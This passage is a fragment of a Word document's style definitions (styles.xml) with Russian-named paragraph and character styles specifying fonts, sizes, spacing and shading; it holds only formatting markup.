      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Mt---2">
    <w:name w:val="Mt-Таблица-Надпись-2"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="567"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="western">
    <w:name w:val="western"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-style-span">
    <w:name w:val="apple-style-span"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fheading1">
    <w:name w:val="f_heading1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:styleId="aff0">
    <w:name w:val="FollowedHyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="pcodeexample">
    <w:name w:val="p_codeexample"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fcodeexample">
    <w:name w:val="f_codeexample"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="aff1">
    <w:name w:val="Основной текст + Полужирный"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="19"/>
      <w:szCs w:val="19"/>
      <w:u w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="28">
    <w:name w:val="Основной текст (2)_"/>
    <w:link w:val="210"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="19"/>
      <w:szCs w:val="19"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="29">
    <w:name w:val="Основной текст (2) + Полужирный"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="19"/>
      <w:szCs w:val="19"/>
      <w:lang w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="42">
    <w:name w:val="Заголовок №4_"/>
    <w:link w:val="410"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="43">
    <w:name w:val="Заголовок №4"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="1c">
    <w:name w:val="Основной текст + Полужирный1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="19"/>
      <w:szCs w:val="19"/>
      <w:u w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="420">
    <w:name w:val="Заголовок №42"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="211">
    <w:name w:val="Основной текст (2) + Полужирный1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="19"/>
      <w:szCs w:val="19"/>
      <w:lang w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="2a">
    <w:name w:val="Основной текст (2)"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="35">
    <w:name w:val="Основной текст (3)_"/>
    <w:link w:val="36"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="44">
    <w:name w:val="Основной текст (4)_"/>
    <w:link w:val="45"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="19"/>
      <w:szCs w:val="19"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="210">
    <w:name w:val="Основной текст (2)1"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="28"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:before="300" w:after="180" w:line="230" w:lineRule="exact"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="19"/>
      <w:szCs w:val="19"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="410">
    <w:name w:val="Заголовок №41"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="42"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:before="300" w:after="300" w:line="240" w:lineRule="atLeast"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="36">
    <w:name w:val="Основной текст (3)"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="35"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:before="240" w:after="60" w:line="240" w:lineRule="atLeast"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="45">
    <w:name w:val="Основной текст (4)"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="44"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:after="180" w:line="226" w:lineRule="exact"/>
      <w:ind w:hanging="360"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="19"/>
      <w:szCs w:val="19"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="120">
    <w:name w:val="Заголовок №1 (2)_"/>
    <w:link w:val="121"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="122">
    <w:name w:val="Заголовок №1 (2)"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="aff2">
    <w:name w:val="Колонтитул_"/>
    <w:link w:val="1d"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style" w:cs="Bookman Old Style"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="13"/>
      <w:szCs w:val="13"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TimesNewRoman">
    <w:name w:val="Колонтитул + Times New Roman"/>
    <w:aliases w:val="13 pt,Интервал 0 pt"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:spacing w:val="10"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="220">
    <w:name w:val="Заголовок №2 (2)_"/>
    <w:link w:val="221"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Microsoft Sans Serif" w:hAnsi="Microsoft Sans Serif" w:cs="Microsoft Sans Serif"/>
      <w:sz w:val="34"/>
      <w:szCs w:val="34"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="222">
    <w:name w:val="Заголовок №2 (2)"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="52">
    <w:name w:val="Основной текст (5)_"/>
    <w:link w:val="510"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style" w:cs="Bookman Old Style"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="520">
    <w:name w:val="Заголовок №5 (2)_"/>
    <w:link w:val="521"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style" w:cs="Bookman Old Style"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="53">
    <w:name w:val="Основной текст (5)"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style" w:cs="Bookman Old Style"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="320">
    <w:name w:val="Заголовок №3 (2)_"/>
    <w:link w:val="321"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Microsoft Sans Serif" w:hAnsi="Microsoft Sans Serif" w:cs="Microsoft Sans Serif"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="322">
    <w:name w:val="Заголовок №3 (2)"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="62">
    <w:name w:val="Основной текст (6)_"/>
    <w:link w:val="610"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style" w:cs="Bookman Old Style"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="63">
    <w:name w:val="Основной текст (6) + Не курсив"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="72">
    <w:name w:val="Основной текст (7)_"/>
    <w:link w:val="710"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:sz w:val="14"/>
      <w:szCs w:val="14"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="73">
    <w:name w:val="Основной текст (7) + Полужирный"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="14"/>
      <w:szCs w:val="14"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="74">
    <w:name w:val="Основной текст (7)"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="720">
    <w:name w:val="Основной текст (7)2"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="83">
    <w:name w:val="Основной текст (8)_"/>
    <w:link w:val="810"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="14"/>
      <w:szCs w:val="14"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="84">
    <w:name w:val="Основной текст (8)"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="37">
    <w:name w:val="Основной текст (3) + 7"/>
    <w:aliases w:val="5 pt5"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="15"/>
      <w:szCs w:val="15"/>
      <w:u w:val="none"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="59">
    <w:name w:val="Основной текст (5)9"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style" w:cs="Bookman Old Style"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="430">
    <w:name w:val="Заголовок №43"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
      <w:u w:val="none"/>
      <w:lang w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TimesNewRoman5">
    <w:name w:val="Колонтитул + Times New Roman5"/>
    <w:aliases w:val="13 pt6,Интервал 0 pt4"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:spacing w:val="10"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="MicrosoftSansSerif1">
    <w:name w:val="Колонтитул + Microsoft Sans Serif1"/>
    <w:aliases w:val="72,5 pt4"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Microsoft Sans Serif" w:hAnsi="Microsoft Sans Serif" w:cs="Microsoft Sans Serif"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="15"/>
      <w:szCs w:val="15"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="58">
    <w:name w:val="Основной текст (5)8"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="54">
    <w:name w:val="Подпись к картинке (5)_"/>
    <w:link w:val="511"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style" w:cs="Bookman Old Style"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="15"/>
      <w:szCs w:val="15"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="55">
    <w:name w:val="Подпись к картинке (5)"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="123">
    <w:name w:val="Основной текст (12)_"/>
    <w:link w:val="1210"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style" w:cs="Bookman Old Style"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="15"/>
      <w:szCs w:val="15"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="124">
    <w:name w:val="Основной текст (12)"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TimesNewRoman4">
    <w:name w:val="Колонтитул + Times New Roman4"/>
    <w:aliases w:val="13 pt5,Интервал 0 pt3"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:spacing w:val="10"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="64">
    <w:name w:val="Основной текст (6)"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="64pt">
    <w:name w:val="Основной текст (6) + 4 pt"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style" w:cs="Bookman Old Style"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="8"/>
      <w:szCs w:val="8"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="620">
    <w:name w:val="Основной текст (6) + Не курсив2"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="56">
    <w:name w:val="Основной текст (5) + Курсив"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style" w:cs="Bookman Old Style"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="130">
    <w:name w:val="Основной текст (13)_"/>
    <w:link w:val="131"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style" w:cs="Bookman Old Style"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="14"/>
      <w:szCs w:val="14"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="132">
    <w:name w:val="Основной текст (13)"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="133">
    <w:name w:val="Основной текст (13) + Не курсив"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="13TimesNewRoman1">
    <w:name w:val="Основной текст (13) + Times New Roman1"/>
    <w:aliases w:val="71,5 pt2"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="15"/>
      <w:szCs w:val="15"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="57">
    <w:name w:val="Основной текст (5)7"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style" w:cs="Bookman Old Style"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:u w:val="single"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="560">
    <w:name w:val="Основной текст (5)6"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style" w:cs="Bookman Old Style"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:u w:val="single"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="550">
    <w:name w:val="Основной текст (5)5"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style" w:cs="Bookman Old Style"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="66">
    <w:name w:val="Основной текст (6)6"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TimesNewRoman3">
    <w:name w:val="Колонтитул + Times New Roman3"/>
    <w:aliases w:val="13 pt4,Интервал 0 pt1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:spacing w:val="10"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="570">
    <w:name w:val="Основной текст (5) + Курсив7"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style" w:cs="Bookman Old Style"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="561">
    <w:name w:val="Основной текст (5) + Курсив6"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style" w:cs="Bookman Old Style"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:u w:val="single"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="1220">
    <w:name w:val="Основной текст (12)2"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="aff3">
    <w:name w:val="Подпись к картинке_"/>
    <w:link w:val="1e"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style" w:cs="Bookman Old Style"/>
      <w:sz w:val="16"/>
